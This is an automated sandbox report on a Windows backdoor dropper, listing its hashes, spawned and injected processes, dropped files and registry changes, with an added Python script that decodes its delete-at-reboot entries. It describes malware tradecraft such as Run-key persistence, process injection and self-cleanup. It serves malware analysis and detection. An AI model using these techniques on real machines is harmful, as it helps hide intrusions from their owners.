Gen.Variant.Hiloti.2_6df0f423fb
Susp_Dropper (Kaspersky), Gen:Variant.Hiloti.2 (AdAware), Backdoor.Win32.PcClient.FD, Tdl4.YR (Lavasoft MAS)
Behaviour: Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: 6df0f423fb672c7925de87b12e214f89
SHA1: 2b78a0aecaa05fddb086e7d44e3456642aeca3ea
SHA256: 7748f74d9408edfecf69d59f1ca5dadc74219d08ba81db98ac9529b9419c275e
SSDeep: 12288:xSMufrmvhQwQ0C9NlVC5doYdX5Ywljpu8fMVgADHm:SzmvhLHqNXC5Ndp9XOG
Size: 534929 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-02-21 21:46:23
Analyzed on: WindowsXP SP3 32-bit
Summary:
Backdoor: malware that gives an attacker remote control of the victim's machine.
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
4IR.exe:612
sc.exe:1304
sc.exe:492
1EuroP.exe:1524
2gansta.exe:1532
net1.exe:584
net1.exe:1604
3IC.exe:1112
net.exe:304
net.exe:2032
rundll32.exe:340
runonce.exe:396
%original file name%.exe:556
Rundll32.exe:132
grpconv.exe:1484
5tbp.exe:1264
The Backdoor injects its code into the following process(es):
lnhz9.exe:352
lnhz9.exe:220
rundll32.exe:636
Explorer.EXE:532
svchost.exe:1084
spoolsv.exe:1424
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process 4IR.exe:612 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s) (byte counts are what the sandbox observed at logging time; lnhz9.exe later runs as a process and is the target of the autorun entry below, so the 55 bytes reported for it cannot be the complete file):
%Documents and Settings%\%current user%\Application Data\mdinstall.inf (426 bytes)
%Documents and Settings%\%current user%\Application Data\MouseDriver.bat (103 bytes)
%Documents and Settings%\%current user%\Application Data\0s70t3ayy.bat (142 bytes)
%Documents and Settings%\%current user%\Application Data\lnhz9.exe (55 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\mdinstall.inf (0 bytes)
The process 1EuroP.exe:1524 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Scv..bat (168 bytes)
The process 3IC.exe:1112 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (673 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (0 bytes)
The process %original file name%.exe:556 makes changes in the file system. The ns?N.tmp names it uses under %Temp% follow the temporary-file convention of NSIS-built installers, so the original file is most likely an NSIS dropper that extracts the numbered components listed here:
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (11920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\2gansta.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5tbp.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\3IC.exe (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\1EuroP.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\4IR.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\cb.exe (3 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\2gansta.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5tbp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\3IC.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\1EuroP.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\4IR.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\cb.exe (0 bytes)
The process 5tbp.exe:1264 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s) (118 bytes is far too small for a loadable DLL, so as with lnhz9.exe the size reflects only what the sandbox recorded; this DLL is the target of the rundll32 autorun entry below):
%WinDir%\msdnih.dll (118 bytes)
Registry activity
The process 4IR.exe:612 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\tgs90gv74r]
"tgs90gv74rpath" = "%Documents and Settings%\%current user%\Application Data\"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\tgs90gv74r]
"tgs90gv74rexepath" = "%Documents and Settings%\%current user%\Application Data\lnhz9.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2F DA D1 DE 91 2F 0C 80 D2 C2 0D C8 DF E6 3F"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\4IR\DEBUG]
"Trace Level" = ""
To run each time Windows starts, the Backdoor registers its dropped executable under the machine-wide autorun key (the same path is also stored under the custom HKLM\SOFTWARE\tgs90gv74r key above):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ez88" = "%Documents and Settings%\%current user%\Application Data\lnhz9.exe"
The Backdoor deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\4IR\DEBUG]
"Trace Level"
The process sc.exe:1304 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C D6 54 D6 92 1B 4A 21 A6 D4 56 67 2B 7F 9A 04"
The process sc.exe:492 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 2C 22 C1 6E 24 D0 A5 BC 92 AA 49 BA 62 79 73"
The process 1EuroP.exe:1524 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\]
"1806" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 21 5B 76 D2 4E B9 EE 17 2C 30 8C C8 5D DF 25"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor sets the IE Local intranet option "Include all network paths (UNCs)". This and the two values that follow are IE's default Local intranet settings (Internet Options > Security > Local intranet > Sites) and are written by WinInet/urlmon whenever a process first initialises zone settings, so they are weak evidence of deliberate tampering:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor sets the IE Local intranet option "Include all sites that bypass the proxy server":
"ProxyBypass" = "1"
The Backdoor sets the IE Local intranet option "Include all local (intranet) sites not listed in other zones":
"IntranetName" = "1"
The process 2gansta.exe:1532 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 F4 ED D0 AA 5C F7 E6 80 58 1B 43 64 47 9C 28"
The process net1.exe:584 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 8C 3D 6F 00 DC AE D8 04 9C 08 56 79 F7 0F 1E"
The process net1.exe:1604 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 89 87 1F 6B D8 AF FE 05 30 AE 14 0A 5B E6 F7"
The process 3IC.exe:1112 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 62 5A DD E1 87 1B E8 DC D0 5F DF 2A 61 18 0A"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\1EuroP.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\3IC.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\4IR.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\5tbp.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\7.tmp,"
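Decoding the value above, as an added example that is not code from the Lavasoft report: the session manager stores PendingFileRenameOperations as REG_MULTI_SZ pairs of (source, destination), and an empty destination means "delete at next boot", so the entry written by 3IC.exe:1112 schedules removal of the dropped components and the nsj3.tmp directory after reboot (the entry written by %original file name%.exe:556 further down uses the same mechanism for 1EuroP.exe). The report flattens the multi-string onto one line joined by ", "; the script undoes that flattening and classifies each pair. REPORT_3IC is the value copied from the report; decode_multi_sz also accepts the list form that winreg.QueryValueEx returns on a live host.

```python
"""Decode the PendingFileRenameOperations value from a sandbox report.

Added example, not part of the Lavasoft report. Windows keeps
HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
as REG_MULTI_SZ made of (source, destination) string pairs that the session
manager applies at the next boot: an empty destination deletes the source,
a destination starting with '!' replaces an existing file, anything else is
a plain rename (MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT). The report
flattens the multi-string into one line joined by ", ".
"""
from dataclasses import dataclass
from typing import Iterable, List

NT_PREFIX = "\\??\\"   # NT object-manager prefix that MoveFileEx records


@dataclass(frozen=True)
class PendingOp:
    action: str        # "delete", "replace" or "rename"
    source: str
    destination: str   # "" for deletes


def _strip_nt(path: str) -> str:
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def decode_multi_sz(entries: Iterable[str]) -> List[PendingOp]:
    """Interpret the REG_MULTI_SZ list exactly as winreg.QueryValueEx returns it."""
    items = list(entries)
    if len(items) % 2:          # tolerate a truncated trailing pair
        items.append("")
    ops = []
    for src, dst in zip(items[0::2], items[1::2]):
        src = _strip_nt(src)
        if dst == "":
            ops.append(PendingOp("delete", src, ""))
        elif dst.startswith("!"):
            ops.append(PendingOp("replace", src, _strip_nt(dst[1:])))
        else:
            ops.append(PendingOp("rename", src, _strip_nt(dst)))
    return ops


def decode_report_value(flat: str) -> List[PendingOp]:
    """Undo the report's ', '-joined flattening, then decode the pairs."""
    return decode_multi_sz(p.strip() for p in flat.split(","))


def deferred_deletes(flat: str) -> List[str]:
    """Paths the sample asked Windows to remove at the next boot."""
    return [op.source for op in decode_report_value(flat) if op.action == "delete"]


# Value recorded for process 3IC.exe:1112 in the report above (copied verbatim).
REPORT_3IC = (
    r'\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\1EuroP.exe, , '
    r'\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\3IC.exe, , '
    r'\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\4IR.exe, , '
    r'\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\5tbp.exe, , '
    r'\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\, , '
    r'\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\7.tmp,'
)

if __name__ == "__main__":
    for op in decode_report_value(REPORT_3IC):
        target = f" -> {op.destination}" if op.destination else ""
        print(f"{op.action:8} {op.source}{target}")
```

On a live Windows host, pass winreg.QueryValueEx(key, "PendingFileRenameOperations")[0] straight to decode_multi_sz; entries that delete a sample's own dropped files under %Temp%, or that replace binaries under %WinDir%, are the ones worth alerting on.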
The process net.exe:304 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 84 04 04 B6 0E 17 5E BD 15 AE 0B 77 F2 50 54"
The process net.exe:2032 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 9E 0D 06 77 8D 5C D7 DA 78 D7 AD C2 73 BD 97"
The process lnhz9.exe:352 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\lnhz9\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 9B 19 06 C4 1E 18 9D C3 E5 AD F4 55 63 BB 69"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\lnhz9\DEBUG]
"Trace Level"
The process lnhz9.exe:220 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 16 39 4D 2B E3 24 63 3C 6F 6D 70 93 F5 8F BA"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
